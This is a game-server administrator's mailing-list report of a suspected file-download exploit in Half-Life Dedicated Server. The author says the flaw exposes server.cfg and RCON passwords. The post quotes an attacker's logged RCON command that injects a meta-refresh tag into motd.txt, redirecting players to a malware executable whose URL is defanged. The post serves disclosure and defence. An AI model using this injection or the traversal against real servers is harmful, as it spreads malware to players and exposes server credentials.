There is an exploit in q3 engine named "q3dirtrav", which allows players to
download any of server files, including server configuration (server.cfg).Today
I found evidence of possible existence of the same exploit in HLDS.As a company
we host hundreds of servers. We received many reports from our customers about
strange HTTP refresh meta tag in the motd.txt of their servers, which leads to
"http *//free -leaks *com/cstrike*exe".The problem has affected several
different servers, unrelated to each other, with very different RCON passwords
(but most were very strong).Here's what I have found in logfiles:Rcon from
178.123.103.201:15518:rcon 1399145428 XXXXXXXXXXXXXXXXXXX motd_write <META
HTTP-EQUIV=Refresh CONTENT="0 URL=http *//free -leaks *com/cstrike*exe">This
"cstrike.exe" contains some kind of a virus.(Note: I've replaced dot with
asterisk and spaces)As you can see the attacker knew the RCON password of each
server.Then I found "server.CFG.ztmp" file in cstrike of each server, which was
attacked.For me that means that the attacker was able to download server.cfg
exactly the same way as maps, models or sounds.
_______________________________________________
To unsubscribe, edit your list preferences, or view the list archives, please
visit:
https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
